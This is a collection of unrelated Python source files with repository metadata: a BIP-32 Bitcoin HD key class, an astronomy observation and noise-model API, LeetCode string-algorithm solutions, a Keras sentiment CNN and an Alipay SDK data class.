class HDPrivateKey(HDKey, PrivateKeyBase):
""" Implements an HD Private Key according to BIP-0032:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
For the vast majority of use cases, the 3 static functions
(HDPrivateKey.master_key_from_entropy,
HDPrivateKey.master_key_from_seed and
HDPrivateKey.from_parent) will be used rather than directly
constructing an object.
Args:
key (PrivateKey or PublicKey): The underlying simple private or
public key that is used to sign/verify.
chain_code (bytes): The chain code associated with the HD key.
depth (int): How many levels below the master node this key is. By
definition, depth = 0 for the master node.
index (int): A value between 0 and 0xffffffff indicating the child
number. Values >= 0x80000000 are considered hardened children.
parent_fingerprint (bytes): The fingerprint of the parent node. This
is 0x00000000 for the master node.
Returns:
HDKey: An HDKey object.
"""
MAINNET_VERSION = 0x0488ADE4
TESTNET_VERSION = 0x04358394
@staticmethod
def master_key_from_mnemonic(mnemonic, passphrase=''):
""" Generates a master key from a mnemonic.
Args:
mnemonic (str): The mnemonic sentence representing
the seed from which to generate the master key.
passphrase (str): Password if one was used.
Returns:
HDPrivateKey: the master private key.
"""
return HDPrivateKey.master_key_from_seed(
Mnemonic.to_seed(mnemonic, passphrase))
@staticmethod
def master_key_from_entropy(passphrase='', strength=128):
""" Generates a master key from system entropy.
Args:
strength (int): Amount of entropy desired. This should be
a multiple of 32 between 128 and 256.
passphrase (str): An optional passphrase for the generated
mnemonic string.
Returns:
HDPrivateKey, str:
a tuple consisting of the master
private key and a mnemonic string from which the seed
can be recovered.
"""
if strength % 32 != 0:
raise ValueError("strength must be a multiple of 32")
if strength < 128 or strength > 256:
raise ValueError("strength should be >= 128 and <= 256")
entropy = rand_bytes(strength // 8)
m = Mnemonic(language='english')
n = m.to_mnemonic(entropy)
return HDPrivateKey.master_key_from_seed(
Mnemonic.to_seed(n, passphrase)), n
@staticmethod
def master_key_from_seed(seed):
""" Generates a master key from a provided seed.
Args:
seed (bytes or str): a string of bytes or a hex string
Returns:
HDPrivateKey: the master private key.
"""
S = get_bytes(seed)
I = hmac.new(b"Bitcoin seed", S, hashlib.sha512).digest()
Il, Ir = I[:32], I[32:]
parse_Il = int.from_bytes(Il, 'big')
if parse_Il == 0 or parse_Il >= bitcoin_curve.n:
raise ValueError("Bad seed, resulting in invalid key!")
return HDPrivateKey(key=parse_Il, chain_code=Ir, index=0, depth=0)
@staticmethod
def from_parent(parent_key, i):
""" Derives a child private key from a parent
private key. It is not possible to derive a child
private key from a public parent key.
Args:
parent_private_key (HDPrivateKey):
"""
if not isinstance(parent_key, HDPrivateKey):
raise TypeError("parent_key must be an HDPrivateKey object.")
hmac_key = parent_key.chain_code
if i & 0x80000000:
hmac_data = b'\x00' + bytes(parent_key._key) + i.to_bytes(length=4, byteorder='big')
else:
hmac_data = parent_key.public_key.compressed_bytes + i.to_bytes(length=4, byteorder='big')
I = hmac.new(hmac_key, hmac_data, hashlib.sha512).digest()
Il, Ir = I[:32], I[32:]
parse_Il = int.from_bytes(Il, 'big')
if parse_Il >= bitcoin_curve.n:
return None
child_key = (parse_Il + parent_key._key.key) % bitcoin_curve.n
if child_key == 0:
# Incredibly unlucky choice
return None
child_depth = parent_key.depth + 1
return HDPrivateKey(key=child_key,
chain_code=Ir,
index=i,
depth=child_depth,
parent_fingerprint=parent_key.fingerprint)
def __init__(self, key, chain_code, index, depth,
parent_fingerprint=b'\x00\x00\x00\x00'):
if index < 0 or index > 0xffffffff:
raise ValueError("index is out of range: 0 <= index <= 2**32 - 1")
private_key = PrivateKey(key)
HDKey.__init__(self, private_key, chain_code, index, depth,
parent_fingerprint)
self._public_key = None
@property
def public_key(self):
""" Returns the public key associated with this private key.
Returns:
HDPublicKey:
The HDPublicKey object that corresponds to this
private key.
"""
if self._public_key is None:
self._public_key = HDPublicKey(x=self._key.public_key.point.x,
y=self._key.public_key.point.y,
chain_code=self.chain_code,
index=self.index,
depth=self.depth,
parent_fingerprint=self.parent_fingerprint)
return self._public_key
def raw_sign(self, message, do_hash=True):
""" Signs message using the underlying non-extended private key.
Args:
message (bytes): The message to be signed. If a string is
provided it is assumed the encoding is 'ascii' and
converted to bytes. If this is not the case, it is up
to the caller to convert the string to bytes
appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
ECPointAffine:
a raw point (r = pt.x, s = pt.y) which is
the signature.
"""
return self._key.raw_sign(message, do_hash)
def sign(self, message, do_hash=True):
""" Signs message using the underlying non-extended private key.
Note:
This differs from `raw_sign()` since it returns a Signature object.
Args:
message (bytes or str): The message to be signed. If a
string is provided it is assumed the encoding is
'ascii' and converted to bytes. If this is not the
case, it is up to the caller to convert the string to
bytes appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
Signature: The signature corresponding to message.
"""
return self._key.sign(message, do_hash)
def sign_bitcoin(self, message, compressed=False):
""" Signs a message using the underlying non-extended private
key such that it is compatible with bitcoind, bx, and other
Bitcoin clients/nodes/utilities.
Note:
0x18 + b\"Bitcoin Signed Message:" + newline + len(message) is
prepended to the message before signing.
Args:
message (bytes or str): Message to be signed.
compressed (bool):
True if the corresponding public key will be
used in compressed format. False if the uncompressed version
is used.
Returns:
bytes: A Base64-encoded byte string of the signed message.
The first byte of the encoded message contains information
about how to recover the public key. In bitcoind parlance,
this is the magic number containing the recovery ID and
whether or not the key was compressed or not. (This function
always processes full, uncompressed public-keys, so the
magic number will always be either 27 or 28).
"""
return self._key.sign_bitcoin(message, compressed)
@property
def identifier(self):
""" Returns the identifier for the key.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
In this case, it will return the RIPEMD-160 hash of the
corresponding public key.
Returns:
bytes: A 20-byte RIPEMD-160 hash.
"""
return self.public_key.hash160()
def __int__(self):
return int(self.key)
class HDPublicKey(HDKey, PublicKeyBase):
""" Implements an HD Public Key according to BIP-0032:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
For the vast majority of use cases, the static function
HDPublicKey.from_parent() will be used rather than directly
constructing an object.
Args:
x (int): x component of the point representing the public key.
y (int): y component of the point representing the public key.
chain_code (bytes): The chain code associated with the HD key.
depth (int): How many levels below the master node this key is. By
definition, depth = 0 for the master node.
index (int): A value between 0 and 0xffffffff indicating the child
number. Values >= 0x80000000 are considered hardened children.
parent_fingerprint (bytes): The fingerprint of the parent node. This
is 0x00000000 for the master node.
Returns:
HDPublicKey: An HDPublicKey object.
"""
MAINNET_VERSION = 0x0488B21E
TESTNET_VERSION = 0x043587CF
@staticmethod
def from_parent(parent_key, i):
"""
"""
if isinstance(parent_key, HDPrivateKey):
# Get child private key
return HDPrivateKey.from_parent(parent_key, i).public_key
elif isinstance(parent_key, HDPublicKey):
if i & 0x80000000:
raise ValueError("Can't generate a hardened child key from a parent public key.")
else:
I = hmac.new(parent_key.chain_code,
parent_key.compressed_bytes + i.to_bytes(length=4, byteorder='big'),
hashlib.sha512).digest()
Il, Ir = I[:32], I[32:]
parse_Il = int.from_bytes(Il, 'big')
if parse_Il >= bitcoin_curve.n:
return None
temp_priv_key = PrivateKey(parse_Il)
Ki = temp_priv_key.public_key.point + parent_key._key.point
if Ki.infinity:
return None
child_depth = parent_key.depth + 1
return HDPublicKey(x=Ki.x,
y=Ki.y,
chain_code=Ir,
index=i,
depth=child_depth,
parent_fingerprint=parent_key.fingerprint)
else:
raise TypeError("parent_key must be either a HDPrivateKey or HDPublicKey object")
def __init__(self, x, y, chain_code, index, depth,
parent_fingerprint=b'\x00\x00\x00\x00'):
key = PublicKey(x, y)
HDKey.__init__(self, key, chain_code, index, depth, parent_fingerprint)
PublicKeyBase.__init__(self)
@property
def identifier(self):
""" Returns the identifier for the key.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
In this case, it will return the RIPEMD-160 hash of the
non-extended public key.
Returns:
bytes: A 20-byte RIPEMD-160 hash.
"""
return self.hash160()
def hash160(self, compressed=True):
""" Return the RIPEMD-160 hash of the SHA-256 hash of the
non-extended public key.
Note:
This always returns the hash of the compressed version of
the public key.
Returns:
bytes: RIPEMD-160 byte string.
"""
return self._key.hash160(True)
def address(self, compressed=True, testnet=False):
""" Address property that returns the Base58Check
encoded version of the HASH160.
Args:
compressed (bool): Whether or not the compressed key should
be used.
testnet (bool): Whether or not the key is intended for testnet
usage. False indicates mainnet usage.
Returns:
bytes: Base58Check encoded string
"""
return self._key.address(True, testnet)
def verify(self, message, signature, do_hash=True):
""" Verifies that message was appropriately signed.
Args:
message (bytes): The message to be verified.
signature (Signature): A signature object.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
verified (bool): True if the signature is verified, False
otherwise.
"""
return self._key.verify(message, signature, do_hash)
@property
def compressed_bytes(self):
""" Byte string corresponding to a compressed representation
of this public key.
Returns:
b (bytes): A 33-byte long byte string.
"""
return self._key.compressed_bytes
|
fe502e4a4513f0704957d34c893ff395672b0da3
|
8150b3e15b39199b231619f79b20f64eb941507e
|
/lenstronomy/SimulationAPI/observation_api.py
|
690f1a850232b776b2409ce4b9aa0dc482937e2b
|
[
"BSD-3-Clause"
] |
permissive
|
sibirrer/lenstronomy
|
8d48ca125fc588a1f97033255746afcdeaaa1e76
|
902a0f318da46bd444d408853f40f744603e2f35
|
refs/heads/main
| 2023-08-21T19:55:18.222805
| 2023-08-21T19:31:01
| 2023-08-21T19:31:01
| 80,772,893
| 115
| 76
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,290
|
py
|
observation_api.py
|
import numpy as np
import warnings
import lenstronomy.Util.data_util as data_util
from lenstronomy.Data.psf import PSF
from lenstronomy.Util.package_util import exporter
export, __all__ = exporter()
@export
class Instrument(object):
"""
basic access points to instrument properties
"""
def __init__(self, pixel_scale, read_noise=None, ccd_gain=None):
"""
:param read_noise: std of noise generated by read-out (in units of electrons)
:param pixel_scale: scale (in arcseconds) of pixels
:param ccd_gain: electrons/ADU (analog-to-digital unit).
A gain of 8 means that the camera digitizes the CCD signal
so that each ADU corresponds to 8 photoelectrons.
"""
if ccd_gain is not None:
ccd_gain = float(ccd_gain)
self.ccd_gain = ccd_gain
self._read_noise = read_noise
self.pixel_scale = pixel_scale
@export
class Observation(object):
"""
basic access point to observation properties
"""
def __init__(self, exposure_time, sky_brightness=None, seeing=None, num_exposures=1,
psf_type='GAUSSIAN', kernel_point_source=None, truncation=5, point_source_supersampling_factor=1):
"""
:param exposure_time: exposure time per image (in seconds)
:param sky_brightness: sky brightness (in magnitude per square arcseconds)
:param seeing: full width at half maximum of the PSF (if not specific psf_model is specified)
:param num_exposures: number of exposures that are combined
:param psf_type: string, type of PSF ('GAUSSIAN' and 'PIXEL' supported)
:param kernel_point_source: 2d numpy array, model of PSF centered with odd number of pixels per axis
(optional when psf_type='PIXEL' is chosen)
:param point_source_supersampling_factor: int, supersampling factor of kernel_point_source
(optional when psf_type='PIXEL' is chosen)
"""
self._exposure_time = exposure_time
self._sky_brightness_ = sky_brightness
self._num_exposures = num_exposures
self._seeing = seeing
self._psf_type = psf_type
self._truncation = truncation
self._kernel_point_source = kernel_point_source
self._point_source_supersampling_factor = point_source_supersampling_factor
def update_observation(self, exposure_time=None, sky_brightness=None, seeing=None, num_exposures=None,
psf_type=None, kernel_point_source=None):
"""
updates class instance with new properties if specific argument is not None
:param exposure_time: exposure time per image (in seconds)
:param sky_brightness: sky brightness (in magnitude per square arcseconds)
:param seeing: full width at half maximum of the PSF (if not specific psf_model is specified)
:param num_exposures: number of exposures that are combined
:param psf_type: string, type of PSF ('GAUSSIAN' and 'PIXEL' supported)
:param kernel_point_source: 2d numpy array, model of PSF centered with odd number of pixels per axis
(optional when psf_type='PIXEL' is chosen)
:return: None, updated class instance
"""
if exposure_time is not None:
self._exposure_time = exposure_time
if sky_brightness is not None:
self._sky_brightness_ = sky_brightness
if seeing is not None:
self._seeing = seeing
if num_exposures is not None:
self._num_exposures = num_exposures
if psf_type is not None:
self._psf_type = psf_type
if kernel_point_source is not None:
self._kernel_point_source = kernel_point_source
@property
def _sky_brightness(self):
if self._sky_brightness_ is None:
raise ValueError('sky_brightness is not set in the class instance!')
return self._sky_brightness_
@property
def exposure_time(self):
"""
total exposure time
:return: summed exposure time
"""
return self._exposure_time * self._num_exposures
@property
def kwargs_psf(self):
"""
keyword arguments to initiate a PSF() class
:return: kwargs_psf
"""
if self._psf_type == 'GAUSSIAN':
psf_type = "GAUSSIAN"
fwhm = self._seeing
truncation = self._truncation
kwargs_psf = {'psf_type': psf_type, 'fwhm': fwhm, 'truncation': truncation}
elif self._psf_type == 'PIXEL':
if self._kernel_point_source is not None:
kwargs_psf = {'psf_type': "PIXEL", 'kernel_point_source': self._kernel_point_source,
'point_source_supersampling_factor': self._point_source_supersampling_factor}
else:
raise ValueError("You need to create the class instance with a psf_model!")
elif self._psf_type == 'NONE':
kwargs_psf = {'psf_type': "NONE"}
else:
raise ValueError("psf_type %s not supported!" % self._psf_type)
return kwargs_psf
@property
def psf_class(self):
"""
creates instance of PSF() class based on knowledge of the observations
For the full possibility of how to create such an instance, see the PSF() class documentation
:return: instance of PSF() class
"""
psf_class = PSF(**self.kwargs_psf)
return psf_class
@export
class SingleBand(Instrument, Observation):
"""
class that combines Instrument and Observation
"""
def __init__(self, pixel_scale, exposure_time, magnitude_zero_point, read_noise=None, ccd_gain=None,
sky_brightness=None, seeing=None, num_exposures=1, psf_type='GAUSSIAN', kernel_point_source=None,
truncation=5, point_source_supersampling_factor=1, data_count_unit='e-', background_noise=None):
"""
:param read_noise: std of noise generated by read-out (in units of electrons)
:param pixel_scale: scale (in arcseconds) of pixels
:param ccd_gain: electrons/ADU (analog-to-digital unit).
A gain of 8 means that the camera digitizes the CCD signal
so that each ADU corresponds to 8 photoelectrons.
:param exposure_time: exposure time per image (in seconds)
:param sky_brightness: sky brightness (in magnitude per square arcseconds in units of electrons)
:param seeing: Full-Width-at-Half-Maximum (FWHM) of PSF
:param magnitude_zero_point: magnitude in which 1 count (e-) per second per arcsecond square is registered
:param num_exposures: number of exposures that are combined
:param point_source_supersampling_factor: int, supersampling factor of kernel_point_source
(optional when psf_type='PIXEL' is chosen)
:param data_count_unit: string, unit of the data (not noise properties - see other definitions),
'e-': (electrons assumed to be IID),
'ADU': (analog-to-digital unit)
:param background_noise: sqrt(variance of background) as a total contribution from readnoise,
sky brightness etc. in units of the data_count_units (e- or ADU)
If you set this parameter, it will use this value regardless of the values of read_noise, sky_brightness
"""
Instrument.__init__(self, pixel_scale, read_noise, ccd_gain) # read_noise and ccd_gain can be None
Observation.__init__(self, exposure_time=exposure_time, sky_brightness=sky_brightness,
seeing=seeing, num_exposures=num_exposures,
psf_type=psf_type, kernel_point_source=kernel_point_source,
point_source_supersampling_factor=point_source_supersampling_factor,
truncation=truncation)
if data_count_unit not in ['e-', 'ADU']:
raise ValueError("count_unit type %s not supported! Please choose e- or ADU." % data_count_unit)
self._data_count_unit = data_count_unit
self._background_noise = background_noise
self._magnitude_zero_point = magnitude_zero_point
@property
def sky_brightness(self):
"""
:return: sky brightness (counts per square arcseconds in unit of data (e- or ADU's) per unit time)
"""
cps = self._sky_brightness_cps
if self._data_count_unit == 'ADU':
cps /= self.ccd_gain
return cps
@property
def _sky_brightness_cps(self):
"""
:return: sky brightness in electrons per second
"""
cps = data_util.magnitude2cps(self._sky_brightness, magnitude_zero_point=self._magnitude_zero_point)
return cps
@property
def background_noise(self):
"""
Gaussian sigma of noise level per pixel in counts (e- or ADU) per second
:return: sqrt(variance) of background noise level in data units
"""
if self._background_noise is None:
if self._read_noise is None:
raise ValueError('read_noise is not specified to evaluate background noise!')
bkg_noise = data_util.bkg_noise(self._read_noise, self._exposure_time, self._sky_brightness_cps,
self.pixel_scale, num_exposures=self._num_exposures)
if self._data_count_unit == 'ADU':
bkg_noise /= self.ccd_gain
return bkg_noise
else:
if self._read_noise is not None:
warnings.warn('read noise is specified but not used for noise properties. Background noise is estimated'
' from "background_noise" argument.')
return self._background_noise
def flux_noise(self, flux):
"""
:param flux: float or array, units of count_unit/seconds, needs to be positive semi-definite in the flux value
:return: Gaussian approximation of Poisson statistics in IIDs sqrt(variance)
"""
flux_iid = self.flux_iid(flux)
variance = flux_iid # the variance of a Poisson distribution is the IID count number
if isinstance(variance, int) or isinstance(variance, float):
variance = max(variance, 0)
else:
variance[flux_iid < 0] = 0 # make sure negative pixels do not lead to variances (or nans) in the return
noise = np.sqrt(variance) / self.exposure_time
if self._data_count_unit == 'ADU':
noise /= self.ccd_gain
return noise
def flux_iid(self, flux_per_second):
"""
IID counts. This can be used by lenstronomy to estimate the Poisson errors
keeping the assumption that the counts are IIDs (even if they are not).
:param flux_per_second: flux count per second in the units set in this class (ADU or e-)
:return: IID count number
"""
if self._data_count_unit == 'ADU':
exp_time = self.ccd_gain * self.exposure_time
else:
exp_time = self.exposure_time
return exp_time * flux_per_second
def noise_for_model(self, model, background_noise=True, poisson_noise=True, seed=None):
"""
:param model: 2d numpy array of modelled image (with pixels in units of data specified in class)
:param background_noise: bool, if True, adds background noise
:param poisson_noise: bool, if True, adds Poisson noise of modelled flux
:param seed: int, seed number to be used to render the noise properties.
If None, then uses the current numpy.random seed to render the noise properties.
:return: noise realization corresponding to the model
"""
if seed is not None:
g = np.random.RandomState(seed=seed)
else:
g = np.random
nx, ny = np.shape(model)
noise = np.zeros_like(model)
if background_noise is True:
noise += g.randn(nx, ny) * self.background_noise
if poisson_noise is True:
noise += g.randn(nx, ny) * self.flux_noise(model)
return noise
def estimate_noise(self, image):
"""
:param image: noisy data, background subtracted
:return: estimated noise map sqrt(variance) for each pixel as estimated from the instrument and observation
"""
return np.sqrt(self.background_noise**2 + self.flux_noise(image)**2)
def magnitude2cps(self, magnitude):
"""
converts an apparent magnitude to counts per second (in units of the data)
The zero point of an instrument, by definition, is the magnitude of an object that produces one count
(or data number, DN) per second. The magnitude of an arbitrary object producing DN counts in an observation of
length EXPTIME is therefore:
m = -2.5 x log10(DN / EXPTIME) + ZEROPOINT
:param magnitude: magnitude of object
:return: counts per second of object
"""
# compute counts in units of e- or ADS (depending on data and magnitude zero point defined)
cps = data_util.magnitude2cps(magnitude, magnitude_zero_point=self._magnitude_zero_point)
if self._data_count_unit == 'ADU':
cps /= self.ccd_gain
return cps
|
650702b0061979988570a2e80affc3ce968f119a
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/distinct-echo-substrings.py
|
1f065c5472e98c2dece05708af253fb69eb80583
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 3,601
|
py
|
distinct-echo-substrings.py
|
# Time: O(n^2 + d), d is the duplicated of result substrings size
# Space: O(r), r is the size of result substrings set
class Solution(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
def KMP(text, l, result):
prefix = [-1]*(len(text)-l)
j = -1
for i in xrange(1, len(prefix)):
while j > -1 and text[l+j+1] != text[l+i]:
j = prefix[j]
if text[l+j+1] == text[l+i]:
j += 1
prefix[i] = j
if (j+1) and (i+1) % ((i+1) - (j+1)) == 0 and \
(i+1) // ((i+1) - (j+1)) % 2 == 0:
result.add(text[l:l+i+1])
return len(prefix)-(prefix[-1]+1) \
if prefix[-1]+1 and len(prefix) % (len(prefix)-(prefix[-1]+1)) == 0 \
else float("inf")
result = set()
i, l = 0, len(text)-1
while i < l: # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabcdefabcdefabcdef
l = min(l, i + KMP(text, i, result));
i += 1
return len(result)
# Time: O(n^2 + d), d is the duplicated of result substrings size
# Space: O(r), r is the size of result substrings set
class Solution2(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
result = set()
for l in xrange(1, len(text)//2+1):
count = sum(text[i] == text[i+l] for i in xrange(l))
for i in xrange(len(text)-2*l):
if count == l:
result.add(text[i:i+l])
count += (text[i+l] == text[i+l+l]) - (text[i] == text[i+l])
if count == l:
result.add(text[len(text)-2*l:len(text)-2*l+l])
return len(result)
# Time: O(n^2 + d), d is the duplicated of result substrings size
# Space: O(r), r is the size of result substrings set
class Solution3(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
MOD = 10**9+7
D = 27 # a-z and ''
result = set()
for i in xrange(len(text)-1):
left, right, pow_D = 0, 0, 1
for l in xrange(1, min(i+2, len(text)-i)):
left = (D*left + (ord(text[i-l+1])-ord('a')+1)) % MOD
right = (pow_D*(ord(text[i+l])-ord('a')+1) + right) % MOD
if left == right: # assumed no collision
result.add(left)
pow_D = (pow_D*D) % MOD
return len(result)
# Time: O(n^3 + d), d is the duplicated of result substrings size
# Space: O(r), r is the size of result substrings set
class Solution_TLE(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
def compare(text, l, s1, s2):
for i in xrange(l):
if text[s1+i] != text[s2+i]:
return False
return True
MOD = 10**9+7
D = 27 # a-z and ''
result = set()
for i in xrange(len(text)):
left, right, pow_D = 0, 0, 1
for l in xrange(1, min(i+2, len(text)-i)):
left = (D*left + (ord(text[i-l+1])-ord('a')+1)) % MOD
right = (pow_D*(ord(text[i+l])-ord('a')+1) + right) % MOD
if left == right and compare(text, l, i-l+1, i+1):
result.add(text[i+1:i+1+l])
pow_D = (pow_D*D) % MOD
return len(result)
|
07f4bf681dac89025c8e4b294aa4ee847406dc43
|
0ba2e5061577f6286ff9265ef1df9aca96769445
|
/machine_learning/sentiment_analysis_twitter/Deep Learning/sentiment_cnn.py
|
819c19a881caf404343d6c4aab00d4ad377a8f4a
|
[
"CC0-1.0"
] |
permissive
|
ZoranPandovski/al-go-rithms
|
68d5d02f80a61de9baf8e50a81a52e7d0b3983a0
|
4ae6ba54e90af14af236e03e435eb0402dcac787
|
refs/heads/master
| 2023-09-04T16:04:04.321676
| 2023-06-06T15:22:16
| 2023-06-06T15:22:16
| 93,438,176
| 1,421
| 2,445
|
CC0-1.0
| 2023-06-15T14:24:28
| 2017-06-05T19:20:20
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,592
|
py
|
sentiment_cnn.py
|
import numpy as np
import pandas as pd
from keras.layers import Input, Dense, Bidirectional, Embedding, Dropout, Flatten
from keras.layers import concatenate, SpatialDropout1D, GlobalAveragePooling1D, GlobalMaxPooling1D
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.models import Model
from sklearn.model_selection import train_test_split
from utils import *
maxlen = 150
max_features = 2500
gop = pd.read_csv('Data/gop.csv')
data = gop[['text','sentiment']]
# Balance Negative - Positive tweets
data[data['sentiment'] == 'Negative'] = data[data['sentiment'] == 'Negative'][:2236]
data = data.dropna()
data['sentiment'].value_counts() #Negative: 8493; Neutral: 3142; Positive: 2236
X, Y = format_data(data, max_features, maxlen)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25, random_state=42)
# Input shape
inp = Input(shape=(maxlen,))
# Embedding and CNN
x = Embedding(max_features, 150)(inp)
x = SpatialDropout1D(0.25)(x)
x = Conv1D(filters=32, kernel_size=3, padding='same', activation='relu')(x)
x = MaxPooling1D(pool_size=2)(x)
x = Conv1D(filters=16, kernel_size=5, padding='same', activation='relu')(x)
x = MaxPooling1D(pool_size=4)(x)
x = Flatten()(x)
# Output layer
output = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inp, outputs=output)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X_train, Y_train, epochs=5, batch_size=32, verbose=1)
results = model.predict(X_test, batch_size=1, verbose=1)
run_test(results, Y_test)
|
736280c58da00a16f404f5b4a72280841ea84398
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/CreditResult.py
|
8d2525ee3bb58dde79eaaac5d267a9e344dcf688
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,171
|
py
|
CreditResult.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class CreditResult(object):
def __init__(self):
self._credit_line = None
self._credit_no = None
self._credit_term = None
self._credit_term_unit = None
self._effective_date = None
self._expire_date = None
self._fee_rate = None
self._interest_rate = None
self._loan_term = None
self._loan_term_unit = None
self._repayment_mode = None
@property
def credit_line(self):
return self._credit_line
@credit_line.setter
def credit_line(self, value):
self._credit_line = value
@property
def credit_no(self):
return self._credit_no
@credit_no.setter
def credit_no(self, value):
self._credit_no = value
@property
def credit_term(self):
return self._credit_term
@credit_term.setter
def credit_term(self, value):
self._credit_term = value
@property
def credit_term_unit(self):
return self._credit_term_unit
@credit_term_unit.setter
def credit_term_unit(self, value):
self._credit_term_unit = value
@property
def effective_date(self):
return self._effective_date
@effective_date.setter
def effective_date(self, value):
self._effective_date = value
@property
def expire_date(self):
return self._expire_date
@expire_date.setter
def expire_date(self, value):
self._expire_date = value
@property
def fee_rate(self):
return self._fee_rate
@fee_rate.setter
def fee_rate(self, value):
self._fee_rate = value
@property
def interest_rate(self):
return self._interest_rate
@interest_rate.setter
def interest_rate(self, value):
self._interest_rate = value
@property
def loan_term(self):
return self._loan_term
@loan_term.setter
def loan_term(self, value):
self._loan_term = value
@property
def loan_term_unit(self):
return self._loan_term_unit
@loan_term_unit.setter
def loan_term_unit(self, value):
self._loan_term_unit = value
@property
def repayment_mode(self):
return self._repayment_mode
@repayment_mode.setter
def repayment_mode(self, value):
self._repayment_mode = value
def to_alipay_dict(self):
params = dict()
if self.credit_line:
if hasattr(self.credit_line, 'to_alipay_dict'):
params['credit_line'] = self.credit_line.to_alipay_dict()
else:
params['credit_line'] = self.credit_line
if self.credit_no:
if hasattr(self.credit_no, 'to_alipay_dict'):
params['credit_no'] = self.credit_no.to_alipay_dict()
else:
params['credit_no'] = self.credit_no
if self.credit_term:
if hasattr(self.credit_term, 'to_alipay_dict'):
params['credit_term'] = self.credit_term.to_alipay_dict()
else:
params['credit_term'] = self.credit_term
if self.credit_term_unit:
if hasattr(self.credit_term_unit, 'to_alipay_dict'):
params['credit_term_unit'] = self.credit_term_unit.to_alipay_dict()
else:
params['credit_term_unit'] = self.credit_term_unit
if self.effective_date:
if hasattr(self.effective_date, 'to_alipay_dict'):
params['effective_date'] = self.effective_date.to_alipay_dict()
else:
params['effective_date'] = self.effective_date
if self.expire_date:
if hasattr(self.expire_date, 'to_alipay_dict'):
params['expire_date'] = self.expire_date.to_alipay_dict()
else:
params['expire_date'] = self.expire_date
if self.fee_rate:
if hasattr(self.fee_rate, 'to_alipay_dict'):
params['fee_rate'] = self.fee_rate.to_alipay_dict()
else:
params['fee_rate'] = self.fee_rate
if self.interest_rate:
if hasattr(self.interest_rate, 'to_alipay_dict'):
params['interest_rate'] = self.interest_rate.to_alipay_dict()
else:
params['interest_rate'] = self.interest_rate
if self.loan_term:
if hasattr(self.loan_term, 'to_alipay_dict'):
params['loan_term'] = self.loan_term.to_alipay_dict()
else:
params['loan_term'] = self.loan_term
if self.loan_term_unit:
if hasattr(self.loan_term_unit, 'to_alipay_dict'):
params['loan_term_unit'] = self.loan_term_unit.to_alipay_dict()
else:
params['loan_term_unit'] = self.loan_term_unit
if self.repayment_mode:
if hasattr(self.repayment_mode, 'to_alipay_dict'):
params['repayment_mode'] = self.repayment_mode.to_alipay_dict()
else:
params['repayment_mode'] = self.repayment_mode
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = CreditResult()
if 'credit_line' in d:
o.credit_line = d['credit_line']
if 'credit_no' in d:
o.credit_no = d['credit_no']
if 'credit_term' in d:
o.credit_term = d['credit_term']
if 'credit_term_unit' in d:
o.credit_term_unit = d['credit_term_unit']
if 'effective_date' in d:
o.effective_date = d['effective_date']
if 'expire_date' in d:
o.expire_date = d['expire_date']
if 'fee_rate' in d:
o.fee_rate = d['fee_rate']
if 'interest_rate' in d:
o.interest_rate = d['interest_rate']
if 'loan_term' in d:
o.loan_term = d['loan_term']
if 'loan_term_unit' in d:
o.loan_term_unit = d['loan_term_unit']
if 'repayment_mode' in d:
o.repayment_mode = d['repayment_mode']
return o
|
973a42b57c5afbd5bdbc0c84fed173e00d98b9b5
|
52f9d2edfe80b683f33832ecf81317ef04da7cd7
|
/src/pygubu/plugins/tk/__init__.py
|
825a2eb4647fc19ffc4bdab800498fdf234b7a2f
|
[
"MIT"
] |
permissive
|
alejandroautalan/pygubu
|
bd1dd455509adadbe91338dec8588c76d4629a50
|
493eaf7f1954d289d996f6b87d35032861f6baac
|
refs/heads/master
| 2023-09-01T14:43:16.502055
| 2023-07-21T01:35:41
| 2023-07-21T01:35:41
| 8,170,146
| 2,026
| 289
|
MIT
| 2023-07-04T03:53:27
| 2013-02-13T00:02:24
|
